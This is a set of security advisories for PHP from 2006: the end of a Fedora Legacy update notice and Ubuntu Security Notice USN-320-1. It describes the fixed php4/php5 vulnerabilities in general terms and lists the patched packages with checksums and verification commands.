fedora/3/updates/x86_64/php-gd-4.3.11-2.8.4.legacy.x86_64.rpm
ce155d28b0e81eb5527cf0e2f496bc8a9e5ce75d
fedora/3/updates/x86_64/php-imap-4.3.11-2.8.4.legacy.x86_64.rpm
39e63584c3419002a43d71973ff93a356fc278c0
fedora/3/updates/x86_64/php-ldap-4.3.11-2.8.4.legacy.x86_64.rpm
b5131dae7d6908114b959d3ab0e1661158e66e0f
fedora/3/updates/x86_64/php-mbstring-4.3.11-2.8.4.legacy.x86_64.rpm
5b366cf0918e314c52e2da44baac70c81dd6fa38
fedora/3/updates/x86_64/php-mysql-4.3.11-2.8.4.legacy.x86_64.rpm
eae4616e39e8a82a4cf931352d4610a293499e5e
fedora/3/updates/x86_64/php-ncurses-4.3.11-2.8.4.legacy.x86_64.rpm
c3c95fb30901f381376be17003f29ed36a7f22d8
fedora/3/updates/x86_64/php-odbc-4.3.11-2.8.4.legacy.x86_64.rpm
4bc178a084fe1df33ac0a92c15f8d7b817f4a2c7
fedora/3/updates/x86_64/php-pear-4.3.11-2.8.4.legacy.x86_64.rpm
9ce8349a77d7817e505629c5944a9c7c59a6e284
fedora/3/updates/x86_64/php-pgsql-4.3.11-2.8.4.legacy.x86_64.rpm
d631abea1dd6cad2bd3d16d52877b5b3f310a2f5
fedora/3/updates/x86_64/php-snmp-4.3.11-2.8.4.legacy.x86_64.rpm
c91a27a8bf159f2586d0d6e8ba1ce07f4651e5bd
fedora/3/updates/x86_64/php-xmlrpc-4.3.11-2.8.4.legacy.x86_64.rpm
b560a17c4ad7954b0184660d900ea2bb37ee1b4a
fedora/3/updates/SRPMS/php-4.3.11-2.8.4.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

    rpm --checksig -v <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

    sha1sum <filename>

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2933
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3883
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0208
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0996
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1490
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1990

9. Contact:

The Fedora Legacy security contact is <secnotice@fedoralegacy.org>. More
project details at http://www.fedoralegacy.org

---------------------------------------------------------------------

    

- 漏洞信息 (F48439)

Ubuntu Security Notice 320-1 (PacketStormID:F48439)
2006-07-24 00:00:00
Ubuntu  security.ubuntu.com
advisory,vulnerability
linux,ubuntu
CVE-2006-0996,CVE-2006-1490,CVE-2006-1494,CVE-2006-1608,CVE-2006-1990,CVE-2006-1991,CVE-2006-2563,CVE-2006-2660,CVE-2006-3011,CVE-2006-3016,CVE-2006-3018
[点击下载]

Ubuntu Security Notice 320-1 - Multiple vulnerabilities in php4 and php5 have been fixed in Ubuntu.

=========================================================== 
Ubuntu Security Notice USN-320-1              July 19, 2006
php4, php5 vulnerabilities
CVE-2006-0996, CVE-2006-1490, CVE-2006-1494, CVE-2006-1608,
CVE-2006-1990, CVE-2006-1991, CVE-2006-2563, CVE-2006-2660,
CVE-2006-3011, CVE-2006-3016, CVE-2006-3018
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  libapache2-mod-php4                      4:4.3.10-10ubuntu4.5
  php4-cgi                                 4:4.3.10-10ubuntu4.5
  php4-cli                                 4:4.3.10-10ubuntu4.5

Ubuntu 5.10:
  libapache2-mod-php5                      5.0.5-2ubuntu1.3
  php5-cgi                                 5.0.5-2ubuntu1.3
  php5-cli                                 5.0.5-2ubuntu1.3
  php5-curl                                5.0.5-2ubuntu1.3

Ubuntu 6.06 LTS:
  libapache2-mod-php5                      5.1.2-1ubuntu3.1
  php5-cgi                                 5.1.2-1ubuntu3.1
  php5-cli                                 5.1.2-1ubuntu3.1
  php5-curl                                5.1.2-1ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

The phpinfo() PHP function did not properly sanitize long strings. A
remote attacker could use this to perform cross-site scripting attacks
against sites that have publicly-available PHP scripts that call
phpinfo(). Please note that it is not recommended to publicly expose
phpinfo(). (CVE-2006-0996)

An information disclosure has been reported in the
html_entity_decode() function. A script which uses this function to
process arbitrary user-supplied input could be exploited to expose a
random part of memory, which could potentially reveal sensitive data.
(CVE-2006-1490)

The wordwrap() function did not sufficiently check the validity of the
'break' argument. An attacker who could control the string passed to
the 'break' parameter could cause a heap overflow; however, this
should not happen in practical applications. (CVE-2006-1990)

The substr_compare() function did not sufficiently check the validity
of the 'offset' argument. A script which passes untrusted user-defined
values to this parameter could be exploited to crash the PHP
interpreter. (CVE-2006-1991)

In certain situations, using unset() to delete a hash entry could
cause the deletion of the wrong element, which would leave the
specified variable defined. This could potentially cause information
disclosure in security-relevant operations. (CVE-2006-3017)

In certain situations the session module attempted to close a data
file twice, which led to memory corruption. This could potentially be
exploited to crash the PHP interpreter, though that could not be
verified. (CVE-2006-3018)

This update also fixes various bugs which allowed local scripts
to bypass open_basedir and 'safe mode' restrictions by passing special
arguments to tempnam() (CVE-2006-1494, CVE-2006-2660), copy()
(CVE-2006-1608), the curl module (CVE-2006-2563), or error_log()
(CVE-2006-3011).


Updated packages for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5.diff.gz
      Size/MD5:   281888 6b2f9b14e6b17fd16b39fc992370c700
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5.dsc
      Size/MD5:     1469 e107321f5a864fec29aba0ddc4557bda
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10.orig.tar.gz
      Size/MD5:  4892209 73f5d1f42e34efa534a09c6091b5a21e

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.5_all.deb
      Size/MD5:     1128 e68858ad284ff509a9a7ba6004cd85b3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.10-10ubuntu4.5_amd64.deb
      Size/MD5:  1657574 00032fa4aca5c15403f290cae27bfe38
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.10-10ubuntu4.5_amd64.deb
      Size/MD5:  3275318 be667056767f298619d7c48d73f22c00
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cli_4.3.10-10ubuntu4.5_amd64.deb
      Size/MD5:  1647612 d615fd92ad1609108ec1e877ce748ade
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-common_4.3.10-10ubuntu4.5_amd64.deb
      Size/MD5:   168182 ad4bd0b977814c2c3379235d76cf2ed2
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.10-10ubuntu4.5_amd64.deb
      Size/MD5:   348270 03f94109b0ea8c73d8d88e50e10efede

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.10-10ubuntu4.5_i386.deb
      Size/MD5:  1592870 c6b451acf5d81078e94fb5a54b95d6a2
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.10-10ubuntu4.5_i386.deb
      Size/MD5:  3169782 cf7f5272636d079f7c63b64e9223b7d9
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cli_4.3.10-10ubuntu4.5_i386.deb
      Size/MD5:  1592870 e05d13859444b3099f5b1a97b0d837ca
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-common_4.3.10-10ubuntu4.5_i386.deb
      Size/MD5:   168172 b8c9e8464a33ec55dfabbada52ee8daa
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.10-10ubuntu4.5_i386.deb
      Size/MD5:   348248 204bfc480c4836584bd602c8889ccb66

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.10-10ubuntu4.5_powerpc.deb
      Size/MD5:  1659004 638144a3de0f22ba6de5205a3ae49aa6
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.10-10ubuntu4.5_powerpc.deb
      Size/MD5:  3278846 8bc3694c01c50a02a2cfcba348c4ca04
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cli_4.3.10-10ubuntu4.5_powerpc.deb
      Size/MD5:  1646202 e56983733773b5e9d503b3d79e46d40b
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-common_4.3.10-10ubuntu4.5_powerpc.deb
      Size/MD5:   168182 7845a86818f44b188e0e2b8a4ab9362b
    http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.10-10ubuntu4.5_powerpc.deb
      Size/MD5:   348282 e4f04ccf48c23120b57a644ea02aeb10

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.3.diff.gz
      Size/MD5:   107447 9032c71ebc4f7cbabe69cf553ca53bb6
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.3.dsc
      Size/MD5:     1707 3101f858bd7f41d4d9596899e6fd545c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5.orig.tar.gz
      Size/MD5:  6082082 ae36a2aa35cfaa58bdc5b9a525e6f451

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.0.5-2ubuntu1.3_all.deb
      Size/MD5:   173678 bf244c954f00526ebfb99d054610cb22
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.3_all.deb
      Size/MD5:     1040 17d3d2c9eb5aaeea047f7b95df5d7c4b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:  2013202 1b04af5e687093f08538931e36dc70b0
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:  3972082 08c12a61c249e2da0dd8aa3bb716f385
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:  1996996 6450642ae567b85ea5d9297c6f23f67a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:   128432 e2d07624f754c9d73b48107042e71b99
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:    24026 8d2d964e492961d6cf1f10bb73e579e7
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:   218782 a82953cc5cc39025399ea5f8a4f2d7d7
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:    35562 1790527d4ff6025ec4939551be47903a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:    20666 0a674c8481ebd5386174b6cdc5ac6823
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:     8614 45094af5e7c8cc5d4b2918474acb9a83
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:    24474 59143733316c412dd1d1bd909b88a50f
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:    29288 ef96b5317173c70120473b5477039975
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:    40076 1c97310bf8ba44a567aef83ac0be675f
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:     8094 854a549449f48f8a73aeec3f6233c62b
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:    14472 bb882674e6d1046b60d34456f9fc08db
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:    28156 5a1d8b3542e1dd150831a2e732196b79
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:    22216 791efc45078dacdaff1e46ce67765ae3
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:    41902 3ecdf309ebf41cd8a282ba1afb3e007c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.0.5-2ubuntu1.3_amd64.deb
      Size/MD5:    15094 ba2f77b039cbfa625af0a9f652370a18

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:  1868910 8b5e823a4ecd09e0c6f6926858a789dc
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:  3710078 81225be7db368cba84d533a277b539b8
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:  1864350 72b2f25953949657d9c260e3bca1ec05
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:   128444 98ee9ba50b6aa5f1660192e5ea5978b8
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:    22202 d6a0c0f2b2ccbaf12cae065324a5b3a3
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:   218774 c0f60ce8d9d50b4b49e9540cc2a36dfc
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:    31616 5f0ea2409a615bf3544c564e4bd6ea2b
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:    18544 28ae6c10fc23a0b6f4e62df7b1ff50bf
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:     8244 01bed809de0a316fde10ddd8071be09f
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:    21282 146de2727a59411b6fced0296878a233
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:    26388 4db6f8a93ecad07526ec57914238bdb6
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:    36046 ccd2c3e48ff4933d8024f4bf9e63a71c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:     7854 7a57748c192cafa2bd51767fc5ee6a59
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:    13368 5d36642b8746d79f9a0bf6f7e8bcaea9
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:    24738 57ce594aae02451cd2d2bae081c37e7a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:    20116 dbfce571c4049001a372ee7967257d65
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:    37496 587fedbd13ea5dacd40a9393df82ea1d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.0.5-2ubuntu1.3_i386.deb
      Size/MD5:    14022 3e7e78ae38565fd50824d23af99baf77

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:  1984118 d16a481d0e1f6bc2a6d37edb3c6f6a52
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:  3908380 c26873ccce65fb6b16592afb9c1dc934
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:  1962282 24a0ba0276705ab6fb6c2f91e1e96720
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:   128432 6c40b57a02306a68517be57f61f9e409
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    25952 ae39a138cdfc0a964d8c45eb1b238342
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:   218814 8d26a46db1d8db1d234255d1caf50006
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    35494 adf50b6a3144f59e68d0d94333bbf1fd
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    21140 37a079fcf2d9dda260b9c971b78b04b2
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    10008 e5cc8f38385453bc9900d072b169d087
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    23966 285fcc837cf6aa792801b42066be1cc2
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    29358 bd0b0075fe949d0c5079b373e1eac447
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    39792 15013eb73dbb8ccd38fa26cfeb9e061a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:     9508 59d83f23ba86aee8e9082a464296ffb2
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    15304 b1bed8592aa79f6d9ab3e7f5bc074936
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    28400 abc0f2c8a00d634a8eb4d6c11190a559
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    23186 64d8774f133a3315a91bc893542d9b0d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    40472 759acb5a0518651ff51ecfa287f83254
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.0.5-2ubuntu1.3_powerpc.deb
      Size/MD5:    15892 4662f678768b93805f9983ca867cea70

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:  1928324 40cdf5f5e1f5f15b2980f1f5ed3309bb
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:  3782352 dfe9afcf83981de0aff528458fbe33ef
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:  1901420 251ad5a78ef8aa596e5604c624d8030f
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:   128438 30d7f2c25b2592c687e4b4e0d709ad34
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:    23976 10399bd0128b487ab28b2e1a5236c4f4
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:   218786 ba524eec8df9827b2b7ce6407c7d3219
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:    32018 a179ec8b26bdcf1a069b7042cd34acaa
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:    18718 19acc471bd2c479bc67d8b3edf919397
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:     8164 c7b47f1d0dc1c7b77c6cbbe07d8c1043
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:    21580 08f3c66f7e4554bf5cc3b2a54fa5aa8c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:    26094 cc6312b1cefe8459a97b6a0327a9f587
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:    36988 9e67e420e59473e707de1c75651c910c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:     7810 dec138fbd786be76f7e9d538f5d6b8e7
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:    13248 52397133b112407c1bf05cf10d762c56
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:    25108 35b7aee4da74b319bbec67f4d90baf5d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:    20342 536679e33d910473c5e82a94bbc7aac8
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:    37774 537748c5219e8e770d4a6134b19d718a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.0.5-2ubuntu1.3_sparc.deb
      Size/MD5:    13880 b809cf6e7019f3c81bdc1435ee6e49c6

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.1.diff.gz
      Size/MD5:   102328 0355a96821276d519f8c8782a4b6e81a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.1.dsc
      Size/MD5:     1768 36e92785f0566e85a217ca71e9a5c2b2
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2.orig.tar.gz
      Size/MD5:  8064193 b5b6564e8c6a0d5bc1d2b4787480d792

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.1.2-1ubuntu3.1_all.deb
      Size/MD5:   301884 c046bd6ffadcc67a3e92d11c97056433
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.1_all.deb
      Size/MD5:     1040 adf10698f586c659825d6bb419c57e02

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:  2431682 61f5733a352dfeb55319e64962b07b16
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:  4753556 5e3dbc03330025849e16f4273e8281f9
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:  2386436 f918005d73af393b95fee5804a6a19c6
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:   132220 18e09e8a61fd7c35b0324be125f6cbca
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    24622 34a3fe2d2c339f5815794880c16ccf3c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:   312566 ec860e3b87e3fa338678d8676c5bd544
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    36810 ce539b52c64ab961a98e0dadca8ed009
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    22136 7f162265c6fcf1d1250b474fdf199ee1
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:     8784 852555dbda7dbd246e372d6bb5d30498
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    25248 16b3d4dcbc2a82d1b57cc0355442baec
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    43910 b7402ad95554596e4f06caee3f589363
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    30158 f7e60578d375c361d0548c59a6880334
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    44398 a314d6426cff9d0ef51b867362ddcaea
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:     8352 9370cc7ea8af2b810a12036331a85951
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    15302 6cabda8e5d79d6ed825762a29f64d296
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    29190 fa1f6b745e4c3bb3e95a78ecb05e170c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    22708 07dbc134b2c52e87074b2b6c1fd9759c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    42308 440aac6d2be4437c9fa7d35be03335e5
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.1_amd64.deb
      Size/MD5:    16396 23d10221afc2804bcee2c8a7cf997d97

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:  2259588 02b7a2baeaff3c83b9ddaa22b8177f39
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:  4468596 70f930ba44a061b2fb294dae395a2fb2
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:  2244730 87f343eaef3ef8361af79dab8e329763
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:   132234 3e5286b58f2debadf1fecbd5e5f19873
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    22842 e6520ae7794215acce0228569bb16b19
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:   312576 36c5959173a9383e85172518e357592a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.1_i386.deb
      Size/MD5:    32836 879e7bf19c11a05c3988a86401057c71
